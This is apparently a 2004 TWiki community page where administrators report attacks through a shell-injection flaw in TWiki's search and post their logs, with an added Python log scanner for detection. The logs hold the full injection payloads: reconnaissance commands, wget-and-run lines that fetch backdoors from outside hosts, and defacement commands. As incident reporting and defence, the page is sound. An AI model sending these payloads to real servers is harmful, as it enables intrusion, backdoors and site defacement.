201.9.37.167 - - [20/Nov/2004:17:26:23 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.37.167 - - [20/Nov/2004:17:26:25 +0100] "GET /twiki/pub/TWiki/TWikiLogos/kennethwiki-trans.gif HTTP/1.1" 200 1478 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.37.167 - - [20/Nov/2004:17:26:34 +0100] "GET /twiki/bin/view/Sandbox/WebSearch?CGISESSID=c5e2d166333bc19ae4c22c6289608188&search=doesnotexist1%27%3B+%28+uname+-a%3Bid+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 11671 "http://www.lavrsen.dk/twiki/bin/view/Sandbox/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 


194.102.131.10 - - [21/Nov/2004:02:46:01 +0100] "GET /twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice HTTP/1.1" 200 30607 "http://www.google.ro/search?q=twiki+*.cc&hl=ro&lr=&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:03 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:03 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:05 +0100] "GET /twiki/pub/TWiki/TWikiLogos/motion-trans.gif HTTP/1.1" 200 1948 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:05 +0100] "GET /twiki/pub/TWiki/SmiliesPlugin/smile.gif HTTP/1.1" 200 93 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:05 +0100] "GET /twiki/pub/TWiki/TablePlugin/diamond.gif HTTP/1.1" 200 881 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:05 +0100] "GET /twiki/pub/icn/else.gif HTTP/1.1" 200 139 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:46:59 +0100] "GET /twiki/bin/view/Motion/WebSearch?CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde&CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde HTTP/1.1" 200 12023 "http://www.lavrsen.dk/twiki/bin/view/Motion/VideoFourLinuxLoopbackDevice" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:47:01 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 304 - "http://www.lavrsen.dk/twiki/bin/view/Motion/WebSearch?CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde&CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.10 - - [21/Nov/2004:02:47:03 +0100] "GET /twiki/bin/view/Motion/WebSearch?search=doesnotexist1%27%3B+%28cd+%2Ftmp+%3B+wget+www.adformacion.com%2Fzbind+%3B+chmod+777+x++%2Ftmp%2Fzbind+%3B+%2Ftmp%2Fzbind%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3Bfgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 12241 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebSearch?CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde&CGISESSID=5807d4dc20f49ffa5fec3b42ca43abde" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 


201.8.172.160 - - [21/Nov/2004:17:50:37 +0100] "GET /twiki/bin/view/Motion/WebHome HTTP/1.1" 200 24235 "http://www.google.com.br/search?hl=pt-BR&q=allinurl%3A.twiki+site%3A.dk&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.8.172.160 - - [21/Nov/2004:17:50:39 +0100] "GET /twiki/pub/TWiki/PatternSkin/layout.css HTTP/1.1" 200 1823 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.8.172.160 - - [21/Nov/2004:17:50:40 +0100] "GET /twiki/pub/TWiki/PatternSkin/style.css HTTP/1.1" 200 26609 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.8.172.160 - - [21/Nov/2004:17:50:42 +0100] "GET /twiki/pub/TWiki/TWikiLogos/motion-trans.gif HTTP/1.1" 200 1948 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.8.172.160 - - [21/Nov/2004:17:50:56 +0100] "GET /twiki/bin/search/Motion/SearchResult?CGISESSID=c78fdb9a34f25de346ea657d763341d6&search=doesnotexist1%27%3B+%28uname+-a%3B+id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 5162 "http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 

Damage Done

None. I was lucky being on the developers mailing list getting a very early warning.

As one can see, the pattern is clear. These are crackers reading about the exploit, searching for TWiki sites on Google and then trying the exploit exactly as it is reported. And if they succeed - your site is doomed and probably becoming a spam factory.

The developer mailing list is now pretty busy with a lot of traffic. That is great for developers and curious people like me. What we need is a mailing list for security alerts.

-- KennethLavrsen - 21 Nov 2004

Main.BenoitFauvel

At Dreamhost, I notice in my logs the following:

| 18 Nov 2004 - 15:29 | Main.guest | search | Know Main Presentation Sandbox Skin1 TWiki Trash | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 81.196.171.245 |
| 18 Nov 2004 - 15:29 | Main.guest | search | Know Main Presentation Sandbox Skin1 TWiki Trash | doesnotexist1'; (cd /tmp;wget papy.bz/crond;chmod 777 crond) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 81.196.171.245 |
| 18 Nov 2004 - 15:29 | Main.guest | search | Know Main Presentation Sandbox Skin1 TWiki Trash | doesnotexist1'; (/tmp/crond;rm -rf /tmp/crond*) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 81.196.171.245 |
But nothing occurs as it is a very static site.

-- BenoitFauvel - 22 Nov 2004

For more discussion of how best to notify people of security alerts, see BroadcastMessageForAllDownloads and TWikiSecurityAlertProcess.

-- RichardDonkin - 23 Nov 2004

http://freedesktop.org/ was compromised and there's a painful discussion on http://lwn.net. (I also commented on the latest LWN story, still subscriber-only, in which it was officially confirmed it was TWiki.)

We have lost Freedesktop as a well-known user of TWiki, and much security credibility - they are going for MoinMoin. The upshot of all this is that we absolutely must have a low-volume security alert email list that everyone who downloads is encouraged to use, and a TWikiSecurityHome page that is visible on every left bar and has latest vulnerabilities, email list signup, good practices links, etc.

Now that the exploit is actively being used, I think we should also publish the alert to BugTraq and other security alert lists - enough bad guys already know about it, and some of the good guys still have no idea.

Let's continue discussion of process/alerts over on TWikiSecurityAlertProcess, where I've also posted this comment.

-- RichardDonkin - 24 Nov 2004

Yes guys, I got severely hacked by phishers who made my site look like PayPal and then sent out emails to come to it and share their login details. Destination of the username/pw was a .ru DNS so it's active organised crime who are exploiting it - and they have clever rootkits, hide their tracks very well. I only found them because they left a bash history. This was a Twiki which wasn't even linked to a public site (now) but google had a cache I suppose. I wish I had known about the exploit (but an email just arrived so someone found me - sadly shutting the stable door a little too late).

Tim King

-- TimKing - 28 Nov 2004

Jeez, it would be nice maybe to put a note to some places like LWN.NET? A quick perusal there shows security alerts for Apache and MoinMoin, hint hint. It isn't just for the Kernel...

Well, I apparently got hacked, it doesn't look like they got out of the web server account, or even like they hacked the pages, but they left something called "/tmp/bind" running, and a shell, probably it was spamming or something. It also looks as though they grabbed the .htpasswd files, and poked around. -- TomOehser

-- TomOehser - 28 Nov 2004

My site at www.ecc.lu got hacked as well, but I think no root access was obtained (all the files I found belonged to the apache user, and the MD5s of the important binaries are unchanged). The following programs were installed: /var/tmp/.bash/mech, /tmp/.psy/antrojan.pl (mimics inetd in perl), /tmp/bd (PsychoTropia backdoor).

A number of IRC connections to dana.basefreak.nl and moya.chello.no were active.

I've gathered whatever information was available in the logs (like IP addresses etc.).

Stefaan Eeckels

-- StefaanEeckels - 28 Nov 2004

LWN posted a Gentoo security alert for TWiki already, so in that sense it's covered. It would be good to have a well defined list of sites such as LWN to notify, as well as email lists. Do comment over on TWikiSecurityAlertProcess.

-- RichardDonkin - 28 Nov 2004

I patched the TWiki on my main site as soon as I got the original notice, and until today hadn't thought much about it. Then I stumbled on a second notice (that Yahoo's spam filter had caught by the way, so many people may have missed it because of spam filters seeing it as spam) and thought I'd check the logs. My host only lets me see one day's worth of log file (and I haven't bothered trying to capture more - though I might now), but I see three attempts in yesterday's log file alone:

200-206-164-44.dsl.telesp.net.br - - [27/Nov/2004:00:39:18 -0600] "GET /twiki/bin/search//?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 404 877 "-" "-"
topsecret.pre-tel.dk - - [27/Nov/2004:03:44:08 -0600] "GET /cgi-bin/twiki/bin/search/Main/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
200.157.134.2 - - [27/Nov/2004:11:30:53 -0600] "GET /cgi-bin/twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28cd+%2Ftmp%3Bwget+merosdetalhes.bluehosting.com.br%2Fcgixc%3B+chmod+777+cgixc%3B+.%2Fcgixc%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 500 604 "http://www.bluedonkey.org/cgi-bin/twiki/bin/view/TWiki/WebSearch" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"

The second one seems to have been run manually from a browser (there are log entries for the image files etc. in the results page). The other two do not appear in the log file after the search submission, so I assume that they were scripts that were not interested in graphics files ;-)

The last one of the three is attempting to download the PsychoPhobia Backdoor (the URL it wgets is still live for those that want to look at this binary, and a little search on the web will reveal the source too). This is a little backdoor that will listen on port 44464 - check on any servers you run that this port is not in use (netstat -a --inet) and even better block it (and all other ports you do not need) in your firewall rules. When running, anybody can telnet to that port for shell access to your box.

-- JohnGordon - 28 Nov 2004
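A way to pull these attempts out of an access log in bulk, added here as an example and not part of any of the reports on this page. It URL-decodes each request, matches the shape of the payload (close the quote, a parenthesised command group, the sed wrapper, reopen the quote) rather than the literal string `__BEGIN__`, since some attackers used other marker text, and puts the extracted command into a rough class. The log lines inside it are constructed to resemble the reported ones, with private addresses and an invalid download host; the regexes and class names are this example's own.

```python
"""Added example: extract and classify the TWiki search injection payload
from Apache access-log lines. Not code from the original page."""
import re
from urllib.parse import unquote_plus

# Constructed sample lines modelled on the requests reported in this thread
# (private source addresses, download host replaced by an invalid name).
SAMPLE_LOG = r'''
10.0.0.1 - - [27/Nov/2004:00:39:18 -0600] "GET /twiki/bin/search//?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 404 877 "-" "-"
10.0.0.2 - - [27/Nov/2004:11:30:53 -0600] "GET /cgi-bin/twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28cd+%2Ftmp%3Bwget+example.invalid%2Fcgixc%3B+chmod+777+cgixc%3B+.%2Fcgixc%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 500 604 "-" "Mozilla/4.0"
10.0.0.3 - - [22/Nov/2004:10:51:00 -0600] "GET /twiki/bin/search/Main/?search=nonexistantttt%27+%3B+%28uname+-a+%3B+id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2FAAAA%5C1BBBB.txt%2F%27+%3B+fgrep+-i+-l+--+%27nonexistantttt HTTP/1.0" 200 4196 "-" "-"
10.0.0.4 - - [07/Apr/2005:22:36:32 +0200] "GET /twiki/bin/view/Main/WebHome HTTP/1.0" 200 55749 "http://www.google.com/" "Mozilla/5.0"
'''

# Apache common/combined log format; referer and user-agent are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Shape of the payload: end the single-quoted term, run a command group,
# wrap every output line with a marker via sed so it is listed as a
# "result", then reopen the quote so the rest of the real grep command
# line is swallowed. Command groups with nested parentheses are not handled.
INJECT_RE = re.compile(
    r"'\s*;\s*\((?P<cmd>[^)]*)\)\s*\|\s*sed\s+'s/(?P<sed>[^']*)'\s*;\s*f?grep\s+.*?--\s+'"
)
# Marker text placed before the \1 back-reference in the sed replacement.
MARKER_RE = re.compile(r"/(?P<pre>[^/]*)\\1(?P<post>[^/]*)/")

DOWNLOADERS = re.compile(r"\b(wget|curl|fetch|lynx|ftp)\b")
EXECUTORS = re.compile(r"\bchmod\b|\bperl\b|\btar\b|\./\w")
DEFACE = re.compile(r"\b(rm|tee|mv|cp|echo)\b.*\b(index\.html?|default\.htm)\b")
RECON_ONLY = {"uname", "id", "uptime", "ls", "df", "w", "whoami", "ps",
              "cat", "pwd", "hostname", "cd", "echo"}


def classify(cmd):
    """Rough intent of the injected command group (this example's own labels)."""
    if DOWNLOADERS.search(cmd):
        return "download-and-execute" if EXECUTORS.search(cmd) else "download"
    if DEFACE.search(cmd):
        return "defacement"
    # First word of each ';'-separated command decides whether it is pure recon.
    words = {part.strip().split()[0] for part in cmd.split(";") if part.strip()}
    if words and words <= RECON_ONLY:
        return "recon"
    return "other"


def extract_injection(target):
    """Return (command, marker) if the decoded request path/query carries the payload."""
    decoded = unquote_plus(target)
    m = INJECT_RE.search(decoded)
    if not m:
        return None
    mk = MARKER_RE.search(m.group("sed"))
    return m.group("cmd").strip(), (mk.group("pre") if mk else "")


def scan_log(text):
    """Parse every access-log line and report the ones carrying the payload."""
    hits = []
    for line in text.splitlines():
        lm = LOG_RE.match(line)
        if not lm:
            continue
        found = extract_injection(lm.group("target"))
        if found is None:
            continue
        cmd, marker = found
        hits.append({
            "ip": lm.group("ip"), "ts": lm.group("ts"), "status": lm.group("status"),
            "marker": marker, "cmd": cmd, "class": classify(cmd),
            "referer": lm.group("referer") or "-",
        })
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ip"]} {h["ts"]} {h["status"]} [{h["class"]}] marker={h["marker"]} cmd={h["cmd"]!r}')
```

Feed it the real file with `scan_log(open("access.log").read())`. Because the check is structural, it also catches the variant that wraps output in `AAAA...BBBB` instead of `__BEGIN__...__END__`, which a plain `grep __BEGIN__` misses; the HTTP status is worth keeping in the report, since a 200 on the search script means the command line was actually handed to the shell on an unpatched host.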

Fortunately, I had previously restricted access to search on my sites at http://edumacation.com and http://cageyconsumer.com thwarting several hack attempts. Check http://edumacation.com/TwikiSecuritySearchRemoteExecuteExploit for the log entries.

-- EliMantel - 28 Nov 2004

Two more attempts in yesterday's logs:

212.110.91.61 - - [28/Nov/2004:09:37:37 -0600] "GET /cgi-bin/twiki/bin/search/TWiki/?scope=text&search=doesnotexist1%27%3B+%28cd+%2Fdev%2Fshm%3Bwget+aleks-exploits.com%2Famech.tgz%3Btar+zxvf+amech1.tgz%3Bcd+.amech%3B.%2Fsh%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 500 604 "http://www.bluedonkey.org/cgi-bin/twiki/bin/view/TWiki/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
roub.net - - [28/Nov/2004:12:31:10 -0600] "GET /twiki/bin/search/Main/SearchResult?search=doesnotexist1'%3B+(uname%20-a)+%7C+sed+'s%2F%5C(.*%5C)%2F__BEGIN__%5C1__END__.txt%2F'%3B+fgrep+-i+-l+--+'doesnotexist2 HTTP/1.0" 404 877 "-" "Links (0.99; Linux 2.7.1-fake i686; 128x48)"

-- JohnGordon - 29 Nov 2004

I have gotten a ton of these, starting on 18 Nov 2004 in my TWiki log...here is a sample. God Know ... are my webs. Root seems sound.

I reported this to UCSD, and they say they discovered a hack themselves and fixed it already. Don't know how to report to the ip address providers...anyone know how?

| 18 Nov 2004 - 16:12 | Main.TWikiGuest | search | God Know Main Mtm Plugins RDR Saiyan Snarf TWiki Trash | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 81.196.171.245 |

Here's some others, with just the search string. The r0nin virus was running when I found the hack.

doesnotexist1'; (cd /var/tmp;wget http://sixth.ucsd.edu/ks/bd/r0nin; chmod 777 r0nin;./r0nin) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.162.230.113 |

Here's one where they tried (unsuccessfully) to deface the homepage

doesnotexist1'; (cd /home/httpd/twiki;rm index.html) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.162.230.113 |
...
doesnotexist1'; (cd /home/httpd/twiki; wget http://sixth.ucsd.edu/ks/default.htm) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.162.230.113 |

Here are some others...including the bind and cgi.zip hacks which were also running.

doesnotexist1'; (cd /home/httpd/;echo "DaemonOptik" |tee index.html;ls) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.167.247.101 |

doesnotexist1'; (cd /var/tmp;wget http://dt-lan.972location.com/dc; chmod 775 dc;./dc 200.167.247.101 80) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.167.247.101 |

doesnotexist1'; (cd /tmp;mkdir " ";cd " ";wget home.no/yassir/http; chmod +777 http;perl http;ps -x) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 62.179.217.45 |

doesnotexist1'; (cd /tmp ; wget members.lycos.co.uk/spakk/bind ; chmod 777 bind ; ./bind) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.212.71 | 

doesnotexist1'; (cd /tmp;wget http://www.putz1.hpgvip.ig.com.br/cgi.zip;chmod 4777 cgi.zip;./cgi.zip) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 200.217.110.105 |


One of my sourceforge.net installations was attacked. here are the logs:

| 22 Nov 2004 - 10:51 | Main.TWikiGuest | search | Main | nonexistantttt' ; (uname -a ; id) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt |
| 22 Nov 2004 - 10:51 | Main.TWikiGuest | search | Main | nonexistantttt' ; (uname -a ; id) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt |                                                                
| 22 Nov 2004 - 10:51 | Main.TWikiGuest | search | Main | nonexistantttt' ; (uname -a ; id) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt | 84.135.237.222 |                                                                
| 22 Nov 2004 - 10:55 | Main.TWikiGuest | search | Main | nonexistantttt' ; (df -h) | sed 's/\(.*\)/AAAA\1BBBB.txt/' ; fgrep -i -l -- 'nonexistantttt | 84.135.237.222 |
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                                                              
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (wget) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                                                              
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (wget) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                                                                      
| 23 Nov 2004 - 06:56 | Main.TWikiGuest | search | Main | doesnotexist1'; (cd /tmp;wget members.lycos.co.uk/spakk/bind) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'
| 23 Nov 2004 - 06:55 | Main.TWikiGuest | search | Main | doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                                                              
| 23 Nov 2004 - 06:56 | Main.TWikiGuest | search | Main | doesnotexist1'; (cd /tmp;wget members.lycos.co.uk/spakk/bind) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2 | 201.8.210.195 |                               

-- RafaelAlvarez - 29 Nov 2004

They wiped my entire Main web on siebconsulting.org, and tried to wipe all of my virtualhosts... luckily www didn't have write access to those directories... except, of course, to the twiki one. :-/

But the attacks all look similar to the ones on here... the doesnotexist1';etc'doesnotexist2 | blah|

In my case, they were all from South America. Oh well. I needed to upgrade TWiki anyway, right?

-- GlennSieb - 01 Dec 2004


This link and its associated link might be helpful for people needing more information on how to interpret (in general) log entries - http://www.aota.net/Stats/rawlog.php4

-- SueLocke - 3 Dec 2004

Got hacked by bunch that seemed to be from UK.

Put in a defaced index page but didn't seem to do any serious damage, signs of trying to set up IRC using stuff in /tmp, but wiped machine and have upgraded to 02Sep2004 without any significant problems. Can't help with log files as after a brief scan to make sure we hadn't been doing things to other machines locally I wiped everything in order to get machine back up as quickly as possible.

-- TimKirk - 03 Dec 2004

My site has only been operating since 3 December. It still has only a dozen or so users, and I certainly have made no attempt to get it on search engines. I installed the fix within hours of receiving the email on 28 November. I still got hacked:

grep _BEGIN_ access_log :

201.9.36.147 - - [28/Nov/2004:23:16:29 -0700] "GET /twiki/bin/view/TWiki/WebSearch?search=doesnotexist1%27%3B+%28+uname+-a+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 11852 "http://zillion.philosophy.arizona.edu/twiki/bin/view/TWiki/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.36.147 - - [28/Nov/2004:23:16:31 -0700] "GET /twiki/bin/view/TWiki/%USERLAYOUTURL% HTTP/1.1" 400 324 "http://zillion.philosophy.arizona.edu/twiki/bin/view/TWiki/WebSearch?search=doesnotexist1%27%3B+%28+uname+-a+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.9.36.147 - - [28/Nov/2004:23:16:31 -0700] "GET /twiki/bin/view/TWiki/%USERSTYLEURL% HTTP/1.1" 400 324 "http://zillion.philosophy.arizona.edu/twiki/bin/view/TWiki/WebSearch?search=doesnotexist1%27%3B+%28+uname+-a+%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.223.203.50 - - [29/Nov/2004:14:12:27 -0700] "GET /twiki/bin/search/Courses/?scope=text&search=doesnotexist1%27%3B+%28id%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.0" 200 4196 "-" "-"
194.102.131.11 - - [30/Nov/2004:17:23:29 -0700] "GET /twiki/bin/view/Courses/WebSearch?search=doesnotexist1%27%3B+%28ls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3Bfgrep+-i+-l+--+%27doesnotexist2&scope=text HTTP/1.1" 200 11255 "http://zillion.philosophy.arizona.edu/twiki/bin/view/Courses/WebSearch" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.11 - - [30/Nov/2004:17:23:31 -0700] "GET /twiki/bin/view/Courses/%USERLAYOUTURL% HTTP/1.1" 400 324 "http://zillion.philosophy.arizona.edu/twiki/bin/view/Courses/WebSearch?search=doesnotexist1%27%3B+%28ls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3Bfgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
194.102.131.11 - - [30/Nov/2004:17:23:31 -0700] "GET /twiki/bin/view/Courses/%USERSTYLEURL% HTTP/1.1" 400 324 "http://zillion.philosophy.arizona.edu/twiki/bin/view/Courses/WebSearch?search=doesnotexist1%27%3B+%28ls%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3Bfgrep+-i+-l+--+%27doesnotexist2&scope=text" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
213.140.17.96 - - [02/Dec/2004:05:29:11 -0700] "GET /twiki/bin/search/TWiki/SearchResult?search=doesnotexist1%27%3B+%28uname+-a%3B+id%3Buptime%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 4607 "http://zillion.philosophy.arizona.edu/twiki/bin/view/TWiki/WebHome" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"

I haven't been able to find any traces, but my machine stopped serving the TWiki yesterday and locked up term and X access. After rebooting, everything appears normal. Today I switched from the original patch to the one suggested by ChapmanFlack.

-- ShaughanLavine - 03 Dec 2004

dplinux.org got hacked. I saw a backdoor installed, a telnet daemon, and two programs, zero and zbind, on which I could not find information. I ran chkrootkit and it looks like I am clean. Would anyone kindly point me to documentation on how to check the MD5s? I am really doing this for fun and this is no fun, so I think I will close down the site. Let's see if I can attach the log for dplinux.org.

-- AntonioPiccolboni - 05 Dec 2004

Sure - there are MD5s available for most revisions - see the TWikiReleaseTrackerPlugin - the releases.md5 file contains all MD5s for all releases.

However, once a hacker is in I'd be surprised if they leave any trace in TWiki. I'd hazard that you need to do diagnostics on Linux instead.

Best of luck.

-- MartinCleaver - 05 Dec 2004

While the system has been restored, dplinux.org has been taken offline indefinitely until a new home is found, which has proven difficult. It was the first match in the Google search "digital photography linux" and had 3000 visits per month. Unfortunately the type of vulnerability makes me very uncomfortable about running twiki again; I am not so convinced by the patch either, quoting is a difficult art and should be avoided unless shell interpretation is necessary.

-- AntonioPiccolboni - 11 Dec 2004
